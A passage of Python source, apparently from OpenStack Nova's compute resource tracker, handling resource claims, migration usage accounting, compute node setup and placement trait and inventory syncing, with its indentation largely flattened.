# allocations, but the provider UUIDs in old allocations won't
# exist in the current provider tree, so skip it.
LOG.debug("Skip claiming resources of provider %(rp_uuid)s, "
"since the provider UUIDs are not in provider tree.",
{'rp_uuid': rp_uuid})
continue
for rc, amount in alloc_dict['resources'].items():
if rc not in provider_data.resources:
# This means we don't use provider_data.resources to
# assign this kind of resource class, such as 'VCPU' for
# now, otherwise the provider_data.resources will be
# populated with this resource class when updating
# provider tree.
continue
assigned = self.assigned_resources[rp_uuid][rc]
free = provider_data.resources[rc] - assigned
if amount > len(free):
reason = (_("Needed %(amount)d units of resource class "
"%(rc)s, but %(avail)d are available.") %
{'amount': amount,
'rc': rc,
'avail': len(free)})
raise exception.ComputeResourcesUnavailable(reason=reason)
for i in range(amount):
claimed_resources.append(free.pop())
if claimed_resources:
self._add_assigned_resources(claimed_resources)
return objects.ResourceList(objects=claimed_resources)
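    # Illustrative data sketch (added commentary, not part of the original
    # module): ``allocations`` uses the placement allocation format, keyed by
    # resource provider UUID; the UUID and amounts below are made up:
    #
    #     allocations = {
    #         '8e479bd4-2a36-4100-b9dd-d6b464ea3aaa': {
    #             'resources': {'VCPU': 2, 'MEMORY_MB': 2048}},
    #     }
    #
    # Only resource classes present in provider_data.resources (e.g. custom
    # driver-managed resources) are claimed here; classes like VCPU that are
    # not tracked there are skipped, as the loop above notes.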
def _populate_assigned_resources(self, context, instance_by_uuid):
"""Populate self.assigned_resources organized by resource class and
        resource provider uuid, in the following format:
{
$RP_UUID: {
$RESOURCE_CLASS: [objects.Resource, ...],
$RESOURCE_CLASS: [...]},
...}
"""
resources = []
# Get resources assigned to migrations
for mig in self.tracked_migrations.values():
mig_ctx = mig.instance.migration_context
# We might have a migration whose instance hasn't arrived here yet.
# Ignore it.
if not mig_ctx:
continue
if mig.source_compute == self.host and 'old_resources' in mig_ctx:
resources.extend(mig_ctx.old_resources or [])
if mig.dest_compute == self.host and 'new_resources' in mig_ctx:
resources.extend(mig_ctx.new_resources or [])
# Get resources assigned to instances
for uuid in self.tracked_instances:
resources.extend(instance_by_uuid[uuid].resources or [])
self.assigned_resources.clear()
self._add_assigned_resources(resources)
def _check_resources(self, context):
"""Check if there are assigned resources not found in provider tree"""
notfound = set()
for rp_uuid in self.assigned_resources:
provider_data = self.provider_tree.data(rp_uuid)
for rc, assigned in self.assigned_resources[rp_uuid].items():
notfound |= (assigned - provider_data.resources[rc])
if not notfound:
return
# This only happens when assigned resources are removed
# from the configuration and the compute service is SIGHUP'd
# or restarted.
resources = [(res.identifier, res.resource_class) for res in notfound]
reason = _("The following resources are assigned to instances, "
"but were not listed in the configuration: %s "
"Please check if this will influence your instances, "
"and restore your configuration if necessary") % resources
raise exception.AssignedResourceNotFound(reason=reason)
def _release_assigned_resources(self, resources):
"""Remove resources from self.assigned_resources."""
if not resources:
return
for resource in resources:
rp_uuid = resource.provider_uuid
rc = resource.resource_class
try:
self.assigned_resources[rp_uuid][rc].remove(resource)
except KeyError:
LOG.warning("Release resource %(rc)s: %(id)s of provider "
"%(rp_uuid)s, not tracked in "
"ResourceTracker.assigned_resources.",
{'rc': rc, 'id': resource.identifier,
'rp_uuid': rp_uuid})
def _add_assigned_resources(self, resources):
"""Add resources to self.assigned_resources"""
if not resources:
return
for resource in resources:
rp_uuid = resource.provider_uuid
rc = resource.resource_class
self.assigned_resources[rp_uuid][rc].add(resource)
def _set_instance_host_and_node(self, instance, nodename):
"""Tag the instance as belonging to this host. This should be done
        while the COMPUTE_RESOURCE_SEMAPHORE is held so the resource claim
will not be lost if the audit process starts.
"""
# NOTE(mriedem): ComputeManager._nil_out_instance_obj_host_and_node is
# somewhat tightly coupled to the fields set in this method so if this
# method changes that method might need to be updated.
instance.host = self.host
instance.launched_on = self.host
instance.node = nodename
instance.save()
def _unset_instance_host_and_node(self, instance):
"""Untag the instance so it no longer belongs to the host.
        This should be done while the COMPUTE_RESOURCE_SEMAPHORE is held so
the resource claim will not be lost if the audit process starts.
"""
instance.host = None
instance.node = None
instance.save()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def abort_instance_claim(self, context, instance, nodename):
"""Remove usage from the given instance."""
self._update_usage_from_instance(context, instance, nodename,
is_removed=True)
instance.clear_numa_topology()
self._unset_instance_host_and_node(instance)
self._update(context.elevated(), self.compute_nodes[nodename])
def _drop_pci_devices(self, instance, nodename, prefix):
if self.pci_tracker:
# free old/new allocated pci devices
pci_devices = self._get_migration_context_resource(
'pci_devices', instance, prefix=prefix)
if pci_devices:
for pci_device in pci_devices:
self.pci_tracker.free_device(pci_device, instance)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
self.compute_nodes[nodename].pci_device_pools = dev_pools_obj
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim_at_source(self, context, instance, migration):
"""Drop a move claim after confirming a resize or cold migration."""
migration.status = 'confirmed'
migration.save()
self._drop_move_claim(
context, instance, migration.source_node, instance.old_flavor,
prefix='old_')
# NOTE(stephenfin): Unsetting this is unnecessary for cross-cell
# resize, since the source and dest instance objects are different and
# the source instance will be deleted soon. It's easier to just do it
# though.
instance.drop_migration_context()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim_at_dest(self, context, instance, migration):
"""Drop a move claim after reverting a resize or cold migration."""
# NOTE(stephenfin): This runs on the destination, before we return to
# the source and resume the instance there. As such, the migration
        # isn't really reverted yet, but this status is what we use to
        # indicate that we no longer need to account for usage on this host.
migration.status = 'reverted'
migration.save()
self._drop_move_claim(
context, instance, migration.dest_node, instance.new_flavor,
prefix='new_')
instance.revert_migration_context()
instance.save(expected_task_state=[task_states.RESIZE_REVERTING])
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim(self, context, instance, nodename,
flavor=None, prefix='new_'):
        self._drop_move_claim(
            context, instance, nodename, flavor, prefix=prefix)
def _drop_move_claim(
self, context, instance, nodename, flavor=None, prefix='new_',
):
"""Remove usage for an incoming/outgoing migration.
:param context: Security context.
:param instance: The instance whose usage is to be removed.
:param nodename: Host on which to remove usage. If the migration
completed successfully, this is normally the source. If it did not
complete successfully (failed or reverted), this is normally the
destination.
:param flavor: The flavor that determines the usage to remove. If the
migration completed successfully, this is the old flavor to be
removed from the source. If the migration did not complete
successfully, this is the new flavor to be removed from the
destination.
:param prefix: Prefix to use when accessing migration context
attributes. 'old_' or 'new_', with 'new_' being the default.
"""
# Remove usage for an instance that is tracked in migrations, such as
# on the dest node during revert resize.
if instance['uuid'] in self.tracked_migrations:
migration = self.tracked_migrations.pop(instance['uuid'])
if not flavor:
flavor = self._get_flavor(instance, prefix, migration)
# Remove usage for an instance that is not tracked in migrations (such
# as on the source node after a migration).
# NOTE(lbeliveau): On resize on the same node, the instance is
# included in both tracked_migrations and tracked_instances.
elif instance['uuid'] in self.tracked_instances:
self.tracked_instances.remove(instance['uuid'])
if flavor is not None:
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix=prefix)
usage = self._get_usage_dict(
flavor, instance, numa_topology=numa_topology)
self._drop_pci_devices(instance, nodename, prefix)
resources = self._get_migration_context_resource(
'resources', instance, prefix=prefix)
self._release_assigned_resources(resources)
self._update_usage(usage, nodename, sign=-1)
ctxt = context.elevated()
self._update(ctxt, self.compute_nodes[nodename])
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def update_usage(self, context, instance, nodename):
"""Update the resource usage and stats after a change in an
instance
"""
if self.disabled(nodename):
return
uuid = instance['uuid']
# don't update usage for this instance unless it submitted a resource
# claim first:
if uuid in self.tracked_instances:
self._update_usage_from_instance(context, instance, nodename)
self._update(context.elevated(), self.compute_nodes[nodename])
def disabled(self, nodename):
return (nodename not in self.compute_nodes or
not self.driver.node_is_available(nodename))
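    # Illustrative example (added commentary, not part of the original
    # module): the tracker treats a node as "disabled" until
    # update_available_resource() has created a ComputeNode record for it:
    #
    #     rt.disabled('unknown-node')  # -> True, not in self.compute_nodes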
def _check_for_nodes_rebalance(self, context, resources, nodename):
"""Check if nodes rebalance has happened.
The ironic driver maintains a hash ring mapping bare metal nodes
to compute nodes. If a compute dies, the hash ring is rebuilt, and
some of its bare metal nodes (more precisely, those not in ACTIVE
state) are assigned to other computes.
This method checks for this condition and adjusts the database
accordingly.
:param context: security context
:param resources: initial values
:param nodename: node name
:returns: True if a suitable compute node record was found, else False
"""
if not self.driver.rebalances_nodes:
return False
        # It's possible ironic just did a node re-balance, so let's
# check if there is a compute node that already has the correct
# hypervisor_hostname. We can re-use that rather than create a
# new one and have to move existing placement allocations
cn_candidates = objects.ComputeNodeList.get_by_hypervisor(
context, nodename)
if len(cn_candidates) == 1:
cn = cn_candidates[0]
LOG.info("ComputeNode %(name)s moving from %(old)s to %(new)s",
{"name": nodename, "old": cn.host, "new": self.host})
cn.host = self.host
self.compute_nodes[nodename] = cn
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
self._update(context, cn)
return True
elif len(cn_candidates) > 1:
LOG.error(
"Found more than one ComputeNode for nodename %s. "
"Please clean up the orphaned ComputeNode records in your DB.",
nodename)
return False
def _init_compute_node(self, context, resources):
"""Initialize the compute node if it does not already exist.
The resource tracker will be inoperable if compute_node
is not defined. The compute_node will remain undefined if
we fail to create it or if there is no associated service
registered.
If this method has to create a compute node it needs initial
values - these come from resources.
:param context: security context
:param resources: initial values
:returns: True if a new compute_nodes table record was created,
False otherwise
"""
nodename = resources['hypervisor_hostname']
# if there is already a compute node just use resources
# to initialize
if nodename in self.compute_nodes:
cn = self.compute_nodes[nodename]
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
return False
# now try to get the compute node record from the
# database. If we get one we use resources to initialize
cn = self._get_compute_node(context, nodename)
if cn:
self.compute_nodes[nodename] = cn
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
return False
if self._check_for_nodes_rebalance(context, resources, nodename):
return False
# there was no local copy and none in the database
# so we need to create a new compute node. This needs
# to be initialized with resource values.
cn = objects.ComputeNode(context)
cn.host = self.host
self._copy_resources(cn, resources, initial=True)
cn.create()
# Only map the ComputeNode into compute_nodes if create() was OK
# because if create() fails, on the next run through here nodename
# would be in compute_nodes and we won't try to create again (because
# of the logic above).
self.compute_nodes[nodename] = cn
LOG.info('Compute node record created for '
'%(host)s:%(node)s with uuid: %(uuid)s',
{'host': self.host, 'node': nodename, 'uuid': cn.uuid})
self._setup_pci_tracker(context, cn, resources)
return True
def _setup_pci_tracker(self, context, compute_node, resources):
if not self.pci_tracker:
self.pci_tracker = pci_manager.PciDevTracker(context, compute_node)
if 'pci_passthrough_devices' in resources:
dev_json = resources.pop('pci_passthrough_devices')
self.pci_tracker.update_devices_from_hypervisor_resources(
dev_json)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
compute_node.pci_device_pools = dev_pools_obj
def _copy_resources(self, compute_node, resources, initial=False):
"""Copy resource values to supplied compute_node."""
nodename = resources['hypervisor_hostname']
stats = self.stats[nodename]
# purge old stats and init with anything passed in by the driver
# NOTE(danms): Preserve 'failed_builds' across the stats clearing,
# as that is not part of resources
# TODO(danms): Stop doing this when we get a column to store this
# directly
prev_failed_builds = stats.get('failed_builds', 0)
stats.clear()
stats['failed_builds'] = prev_failed_builds
stats.digest_stats(resources.get('stats'))
compute_node.stats = stats
# Update the allocation ratios for the related ComputeNode object
# but only if the configured values are not the default; the
# ComputeNode._from_db_object method takes care of providing default
# allocation ratios when the config is left at the default, so
# we'll really end up with something like a
# ComputeNode.cpu_allocation_ratio of 16.0. We want to avoid
# resetting the ComputeNode fields to None because that will make
# the _resource_change method think something changed when really it
# didn't.
# NOTE(yikun): The CONF.initial_(cpu|ram|disk)_allocation_ratio would
# be used when we initialize the compute node object, that means the
# ComputeNode.(cpu|ram|disk)_allocation_ratio will be set to
# CONF.initial_(cpu|ram|disk)_allocation_ratio when initial flag is
# True.
for res in ('cpu', 'disk', 'ram'):
attr = '%s_allocation_ratio' % res
if initial:
conf_alloc_ratio = getattr(CONF, 'initial_%s' % attr)
else:
conf_alloc_ratio = getattr(self, attr)
# NOTE(yikun): In Stein version, we change the default value of
# (cpu|ram|disk)_allocation_ratio from 0.0 to None, but we still
# should allow 0.0 to keep compatibility, and this 0.0 condition
# will be removed in the next version (T version).
if conf_alloc_ratio not in (0.0, None):
setattr(compute_node, attr, conf_alloc_ratio)
# now copy rest to compute_node
compute_node.update_from_virt_driver(resources)
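    # Illustrative walk-through (added commentary, not part of the original
    # module) of the allocation-ratio resolution above, with made-up values.
    # On first creation (initial=True) the CONF.initial_* options seed the
    # node; afterwards the plain options win only when explicitly set:
    #
    #     attr = 'cpu_allocation_ratio'
    #     conf_alloc_ratio = getattr(CONF, 'initial_%s' % attr)  # e.g. 4.0
    #     # 4.0 is neither 0.0 nor None, so the node field is updated.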
def remove_node(self, nodename):
"""Handle node removal/rebalance.
Clean up any stored data about a compute node no longer
managed by this host.
"""
self.stats.pop(nodename, None)
self.compute_nodes.pop(nodename, None)
self.old_resources.pop(nodename, None)
def _get_host_metrics(self, context, nodename):
"""Get the metrics from monitors and
notify information to message bus.
"""
metrics = objects.MonitorMetricList()
metrics_info = {}
for monitor in self.monitors:
try:
monitor.populate_metrics(metrics)
except NotImplementedError:
LOG.debug("The compute driver doesn't support host "
"metrics for %(mon)s", {'mon': monitor})
except Exception as exc:
LOG.warning("Cannot get the metrics from %(mon)s; "
"error: %(exc)s",
{'mon': monitor, 'exc': exc})
# TODO(jaypipes): Remove this when compute_node.metrics doesn't need
# to be populated as a JSONified string.
metric_list = metrics.to_list()
if len(metric_list):
metrics_info['nodename'] = nodename
metrics_info['metrics'] = metric_list
metrics_info['host'] = self.host
metrics_info['host_ip'] = CONF.my_ip
notifier = rpc.get_notifier(service='compute', host=nodename)
notifier.info(context, 'compute.metrics.update', metrics_info)
compute_utils.notify_about_metrics_update(
context, self.host, CONF.my_ip, nodename, metrics)
return metric_list
def update_available_resource(self, context, nodename, startup=False):
"""Override in-memory calculations of compute node resource usage based
on data audited from the hypervisor layer.
Add in resource claims in progress to account for operations that have
declared a need for resources, but not necessarily retrieved them from
the hypervisor layer yet.
:param nodename: Temporary parameter representing the Ironic resource
node. This parameter will be removed once Ironic
baremetal resource nodes are handled like any other
resource in the system.
:param startup: Boolean indicating whether we're running this on
                        startup (True) or periodic (False).
"""
LOG.debug("Auditing locally available compute resources for "
"%(host)s (node: %(node)s)",
{'node': nodename,
'host': self.host})
resources = self.driver.get_available_resource(nodename)
# NOTE(jaypipes): The resources['hypervisor_hostname'] field now
# contains a non-None value, even for non-Ironic nova-compute hosts. It
# is this value that will be populated in the compute_nodes table.
resources['host_ip'] = CONF.my_ip
# We want the 'cpu_info' to be None from the POV of the
# virt driver, but the DB requires it to be non-null so
# just force it to empty string
if "cpu_info" not in resources or resources["cpu_info"] is None:
resources["cpu_info"] = ''
self._verify_resources(resources)
self._report_hypervisor_resource_view(resources)
self._update_available_resource(context, resources, startup=startup)
def _pair_instances_to_migrations(self, migrations, instance_by_uuid):
for migration in migrations:
try:
migration.instance = instance_by_uuid[migration.instance_uuid]
except KeyError:
# NOTE(danms): If this happens, we don't set it here, and
# let the code either fail or lazy-load the instance later
# which is what happened before we added this optimization.
                # NOTE(tdurakov): this situation is possible for resize/cold
                # migration when the migration is finished but hasn't yet been
                # confirmed/reverted; in that case the instance has already
                # changed host to the destination and no matching happens
LOG.debug('Migration for instance %(uuid)s refers to '
'another host\'s instance!',
{'uuid': migration.instance_uuid})
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def _update_available_resource(self, context, resources, startup=False):
# initialize the compute node object, creating it
# if it does not already exist.
is_new_compute_node = self._init_compute_node(context, resources)
nodename = resources['hypervisor_hostname']
# if we could not init the compute node the tracker will be
# disabled and we should quit now
if self.disabled(nodename):
return
# Grab all instances assigned to this node:
instances = objects.InstanceList.get_by_host_and_node(
context, self.host, nodename,
expected_attrs=['system_metadata',
'numa_topology',
'flavor', 'migration_context',
'resources'])
# Grab all in-progress migrations and error migrations:
migrations = objects.MigrationList.get_in_progress_and_error(
context, self.host, nodename)
# Check for tracked instances with in-progress, incoming, but not
        # finished migrations. For those instances the migration context
        # is not applied yet (it will be during finish_resize when the
        # migration goes to finished state). We need to manually and
        # temporarily apply the migration context here when the resource usage is
# updated. See bug 1953359 for more details.
instance_by_uuid = {instance.uuid: instance for instance in instances}
for migration in migrations:
if (
migration.instance_uuid in instance_by_uuid and
migration.dest_compute == self.host and
migration.dest_node == nodename
):
                # we do not check for the 'post-migrating' migration status
# as applying the migration context for an instance already
# in finished migration status is a no-op anyhow.
instance = instance_by_uuid[migration.instance_uuid]
LOG.debug(
'Applying migration context for instance %s as it has an '
'incoming, in-progress migration %s. '
'Migration status is %s',
migration.instance_uuid, migration.uuid, migration.status
)
# It is OK not to revert the migration context at the end of
# the periodic as the instance is not saved during the periodic
instance.apply_migration_context()
# Now calculate usage based on instance utilization:
instance_by_uuid = self._update_usage_from_instances(
context, instances, nodename)
self._pair_instances_to_migrations(migrations, instance_by_uuid)
self._update_usage_from_migrations(context, migrations, nodename)
# A new compute node means there won't be a resource provider yet since
# that would be created via the _update() call below, and if there is
# no resource provider then there are no allocations against it.
if not is_new_compute_node:
self._remove_deleted_instances_allocations(
context, self.compute_nodes[nodename], migrations,
instance_by_uuid)
cn = self.compute_nodes[nodename]
# NOTE(yjiang5): Because pci device tracker status is not cleared in
# this periodic task, and also because the resource tracker is not
# notified when instances are deleted, we need remove all usages
# from deleted instances.
self.pci_tracker.clean_usage(instances, migrations)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = dev_pools_obj
self._report_final_resource_view(nodename)
metrics = self._get_host_metrics(context, nodename)
# TODO(pmurray): metrics should not be a json string in ComputeNode,
# but it is. This should be changed in ComputeNode
cn.metrics = jsonutils.dumps(metrics)
# Update assigned resources to self.assigned_resources
self._populate_assigned_resources(context, instance_by_uuid)
# update the compute_node
self._update(context, cn, startup=startup)
LOG.debug('Compute_service record updated for %(host)s:%(node)s',
{'host': self.host, 'node': nodename})
# Check if there is any resource assigned but not found
# in provider tree
if startup:
self._check_resources(context)
def _get_compute_node(self, context, nodename):
"""Returns compute node for the host and nodename."""
try:
return objects.ComputeNode.get_by_host_and_nodename(
context, self.host, nodename)
except exception.NotFound:
LOG.warning("No compute node record for %(host)s:%(node)s",
{'host': self.host, 'node': nodename})
def _report_hypervisor_resource_view(self, resources):
"""Log the hypervisor's view of free resources.
This is just a snapshot of resource usage recorded by the
virt driver.
The following resources are logged:
- free memory
- free disk
- free CPUs
- assignable PCI devices
"""
nodename = resources['hypervisor_hostname']
free_ram_mb = resources['memory_mb'] - resources['memory_mb_used']
free_disk_gb = resources['local_gb'] - resources['local_gb_used']
vcpus = resources['vcpus']
if vcpus:
free_vcpus = vcpus - resources['vcpus_used']
else:
free_vcpus = 'unknown'
pci_devices = resources.get('pci_passthrough_devices')
LOG.debug("Hypervisor/Node resource view: "
"name=%(node)s "
"free_ram=%(free_ram)sMB "
"free_disk=%(free_disk)sGB "
"free_vcpus=%(free_vcpus)s "
"pci_devices=%(pci_devices)s",
{'node': nodename,
'free_ram': free_ram_mb,
'free_disk': free_disk_gb,
'free_vcpus': free_vcpus,
'pci_devices': pci_devices})
def _report_final_resource_view(self, nodename):
"""Report final calculate of physical memory, used virtual memory,
disk, usable vCPUs, used virtual CPUs and PCI devices,
including instance calculations and in-progress resource claims. These
values will be exposed via the compute node table to the scheduler.
"""
cn = self.compute_nodes[nodename]
vcpus = cn.vcpus
if vcpus:
tcpu = vcpus
ucpu = cn.vcpus_used
LOG.debug("Total usable vcpus: %(tcpu)s, "
"total allocated vcpus: %(ucpu)s",
{'tcpu': vcpus,
'ucpu': ucpu})
else:
tcpu = 0
ucpu = 0
pci_stats = (list(cn.pci_device_pools) if
cn.pci_device_pools else [])
LOG.debug("Final resource view: "
"name=%(node)s "
"phys_ram=%(phys_ram)sMB "
"used_ram=%(used_ram)sMB "
"phys_disk=%(phys_disk)sGB "
"used_disk=%(used_disk)sGB "
"total_vcpus=%(total_vcpus)s "
"used_vcpus=%(used_vcpus)s "
"pci_stats=%(pci_stats)s",
{'node': nodename,
'phys_ram': cn.memory_mb,
'used_ram': cn.memory_mb_used,
'phys_disk': cn.local_gb,
'used_disk': cn.local_gb_used,
'total_vcpus': tcpu,
'used_vcpus': ucpu,
'pci_stats': pci_stats})
def _resource_change(self, compute_node):
"""Check to see if any resources have changed."""
nodename = compute_node.hypervisor_hostname
old_compute = self.old_resources[nodename]
if not obj_base.obj_equal_prims(
compute_node, old_compute, ['updated_at']):
self.old_resources[nodename] = copy.deepcopy(compute_node)
return True
return False
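    # Illustrative example (added commentary, not part of the original
    # module): obj_equal_prims compares primitive field values while ignoring
    # 'updated_at', so a timestamp-only difference is not a resource change:
    #
    #     rt._resource_change(cn)  # -> False if only updated_at differs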
def _sync_compute_service_disabled_trait(self, context, traits):
"""Synchronize the COMPUTE_STATUS_DISABLED trait on the node provider.
Determines if the COMPUTE_STATUS_DISABLED trait should be added to
or removed from the provider's set of traits based on the related
nova-compute service disabled status.
:param context: RequestContext for cell database access
:param traits: set of traits for the compute node resource provider;
this is modified by reference
"""
trait = os_traits.COMPUTE_STATUS_DISABLED
try:
service = objects.Service.get_by_compute_host(context, self.host)
if service.disabled:
# The service is disabled so make sure the trait is reported.
traits.add(trait)
else:
# The service is not disabled so do not report the trait.
traits.discard(trait)
except exception.NotFound:
# This should not happen but handle it gracefully. The scheduler
# should ignore this node if the compute service record is gone.
LOG.error('Unable to find services table record for nova-compute '
'host %s', self.host)
def _get_traits(self, context, nodename, provider_tree):
"""Synchronizes internal and external traits for the node provider.
        This works in conjunction with the ComputeDriver.update_provider_tree
flow and is used to synchronize traits reported by the compute driver,
traits based on information in the ComputeNode record, and traits set
externally using the placement REST API.
:param context: RequestContext for cell database access
:param nodename: ComputeNode.hypervisor_hostname for the compute node
resource provider whose traits are being synchronized; the node
must be in the ProviderTree.
:param provider_tree: ProviderTree being updated
"""
# Get the traits from the ProviderTree which will be the set
# of virt-owned traits plus any externally defined traits set
# on the provider that aren't owned by the virt driver.
traits = provider_tree.data(nodename).traits
# Now get the driver's capabilities and add any supported
# traits that are missing, and remove any existing set traits
# that are not currently supported.
for trait, supported in self.driver.capabilities_as_traits().items():
if supported:
traits.add(trait)
elif trait in traits:
traits.remove(trait)
# Always mark the compute node. This lets other processes (possibly
# unrelated to nova or even OpenStack) find and distinguish these
# providers easily.
traits.add(os_traits.COMPUTE_NODE)
self._sync_compute_service_disabled_trait(context, traits)
return list(traits)
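    # Illustrative trait merge (added commentary, not part of the original
    # module), with made-up trait names: if the provider currently carries
    # {'CUSTOM_VENDOR_X', 'COMPUTE_VOLUME_MULTI_ATTACH'} and the driver now
    # reports multiattach as unsupported, the externally set CUSTOM_VENDOR_X
    # survives, the capability trait is dropped, COMPUTE_NODE is added, and
    # COMPUTE_STATUS_DISABLED is added/removed per the service status.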
@retrying.retry(stop_max_attempt_number=4,
retry_on_exception=lambda e: isinstance(
e, exception.ResourceProviderUpdateConflict))
def _update_to_placement(self, context, compute_node, startup):
"""Send resource and inventory changes to placement."""
# NOTE(jianghuaw): Some resources(e.g. VGPU) are not saved in the
# object of compute_node; instead the inventory data for these
# resource is reported by driver's update_provider_tree(). So even if
# there is no resource change for compute_node, we need proceed
# to get inventory and use report client interfaces to update
# inventory to placement. It's report client's responsibility to
# ensure the update request to placement only happens when inventory
# is changed.
nodename = compute_node.hypervisor_hostname
# Persist the stats to the Scheduler
# Retrieve the provider tree associated with this compute node. If
# it doesn't exist yet, this will create it with a (single, root)
# provider corresponding to the compute node.
prov_tree = self.reportclient.get_provider_tree_and_ensure_root(
context, compute_node.uuid, name=compute_node.hypervisor_hostname)
# Let the virt driver rearrange the provider tree and set/update
# the inventory, traits, and aggregates throughout.
allocs = None
try:
self.driver.update_provider_tree(prov_tree, nodename)
except exception.ReshapeNeeded:
if not startup:
# This isn't supposed to happen during periodic, so raise
# it up; the compute manager will treat it specially.
raise
LOG.info("Performing resource provider inventory and "
"allocation data migration during compute service "
"startup or fast-forward upgrade.")
allocs = self.reportclient.get_allocations_for_provider_tree(
context, nodename)
self.driver.update_provider_tree(prov_tree, nodename,
allocations=allocs)
# Inject driver capabilities traits into the provider
# tree. We need to determine the traits that the virt
# driver owns - so those that come from the tree itself
# (via the virt driver) plus the compute capabilities
# traits, and then merge those with the traits set
# externally that the driver does not own - and remove any
# set on the provider externally that the virt owns but
# aren't in the current list of supported traits. For
# example, let's say we reported multiattach support as a
# trait at t1 and then at t2 it's not, so we need to
# remove it. But at both t1 and t2 there is a
# CUSTOM_VENDOR_TRAIT_X which we can't touch because it
# was set externally on the provider.
# We also want to sync the COMPUTE_STATUS_DISABLED trait based
# on the related nova-compute service's disabled status.
traits = self._get_traits(
context, nodename, provider_tree=prov_tree)
prov_tree.update_traits(nodename, traits)
self.provider_tree = prov_tree
# This merges in changes from the provider config files loaded in init
self._merge_provider_configs(self.provider_configs, prov_tree)
# Flush any changes. If we processed ReshapeNeeded above, allocs is not
# None, and this will hit placement's POST /reshaper route.
self.reportclient.update_from_provider_tree(context, prov_tree,
allocations=allocs)
def _update(self, context, compute_node, startup=False):
"""Update partial stats locally and populate them to Scheduler."""
# _resource_change will update self.old_resources if it detects changes
# but we want to restore those if compute_node.save() fails.
nodename = compute_node.hypervisor_hostname
old_compute = self.old_resources[nodename]
if self._resource_change(compute_node):
# If the compute_node's resource changed, update to DB. Note that
# _update_to_placement below does not supersede the need to do this
# because there are stats-related fields in the ComputeNode object
# which could have changed and still need to be reported to the
# scheduler filters/weighers (which could be out of tree as well).
try:
compute_node.save()
except Exception:
# Restore the previous state in self.old_resources so that on
# the next trip through here _resource_change does not have
# stale data to compare.
with excutils.save_and_reraise_exception(logger=LOG):
self.old_resources[nodename] = old_compute
self._update_to_placement(context, compute_node, startup)
if self.pci_tracker:
self.pci_tracker.save(context)
def _update_usage(self, usage, nodename, sign=1):
# TODO(stephenfin): We don't use the CPU, RAM and disk fields for much
# except 'Aggregate(Core|Ram|Disk)Filter', the 'os-hypervisors' API,
# and perhaps some out-of-tree filters. Once the in-tree stuff is
# removed or updated to use information from placement, we can think
# about dropping the fields from the 'ComputeNode' object entirely
mem_usage = usage['memory_mb']
disk_usage = usage.get('root_gb', 0)
vcpus_usage = usage.get('vcpus', 0)
cn = self.compute_nodes[nodename]
cn.memory_mb_used += sign * mem_usage
cn.local_gb_used += sign * disk_usage
cn.local_gb_used += sign * usage.get('ephemeral_gb', 0)
cn.local_gb_used += sign * usage.get('swap', 0) / 1024
cn.vcpus_used += sign * vcpus_usage
# free ram and disk may be negative, depending on policy:
cn.free_ram_mb = cn.memory_mb - cn.memory_mb_used
cn.free_disk_gb = cn.local_gb - cn.local_gb_used
stats = self.stats[nodename]
cn.running_vms = stats.num_instances
# calculate the NUMA usage, assuming the instance is actually using
# NUMA, of course
if cn.numa_topology and usage.get('numa_topology'):
instance_numa_topology = usage.get('numa_topology')
# the ComputeNode.numa_topology field is a StringField, so
# deserialize
host_numa_topology = objects.NUMATopology.obj_from_db_obj(
cn.numa_topology)
free = sign == -1
# ...and reserialize once we save it back
cn.numa_topology = hardware.numa_usage_from_instance_numa(
host_numa_topology, instance_numa_topology, free)._to_json()
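    # Illustrative data sketch (added commentary, not part of the original
    # module): the ``usage`` dict consumed by _update_usage above carries
    # flavor-like keys; the numbers are made up. Swap is tracked in MB and
    # folded into local_gb_used after dividing by 1024:
    #
    #     usage = {'memory_mb': 2048, 'root_gb': 20, 'ephemeral_gb': 0,
    #              'swap': 1024, 'vcpus': 2}
    #     # memory_mb_used += 2048; local_gb_used += 20 + 0 + 1; vcpus_used += 2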
def _get_migration_context_resource(self, resource, instance,
prefix='new_'):
migration_context = instance.migration_context
resource = prefix + resource
if migration_context and resource in migration_context:
return getattr(migration_context, resource)
return None
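    # Illustrative example (added commentary, not part of the original
    # module): the prefix argument of _get_migration_context_resource above
    # selects between the old and new sides of the instance's
    # MigrationContext:
    #
    #     rt._get_migration_context_resource(
    #         'numa_topology', instance, prefix='old_')
    #     # -> instance.migration_context.old_numa_topology, or None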
def _update_usage_from_migration(self, context, instance, migration,
nodename):
"""Update usage for a single migration. The record may
represent an incoming or outbound migration.
"""
uuid = migration.instance_uuid
LOG.info("Updating resource usage from migration %s", migration.uuid,
instance_uuid=uuid)
incoming = (migration.dest_compute == self.host and
migration.dest_node == nodename)
outbound = (migration.source_compute == self.host and
migration.source_node == nodename)
same_node = (incoming and outbound)
tracked = uuid in self.tracked_instances
itype = None
numa_topology = None
sign = 0
if same_node:
# Same node resize. Record usage for the 'new_' resources. This
# is executed on resize_claim().
if instance['instance_type_id'] == migration.old_instance_type_id:
itype = self._get_flavor(instance, 'new_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance)
# Allocate pci device(s) for the instance.
sign = 1
else:
# The instance is already set to the new flavor (this is done
# by the compute manager on finish_resize()), hold space for a
# possible revert to the 'old_' resources.
# NOTE(lbeliveau): When the periodic audit timer gets
# triggered, the compute usage gets reset. The usage for an
# instance that is migrated to the new flavor but not yet
# confirmed/reverted will first get accounted for by
# _update_usage_from_instances(). This method will then be
# called, and we need to account for the '_old' resources
# (just in case).
itype = self._get_flavor(instance, 'old_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix='old_')
elif incoming and not tracked:
# instance has not yet migrated here:
itype = self._get_flavor(instance, 'new_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance)
# Allocate pci device(s) for the instance.
sign = 1
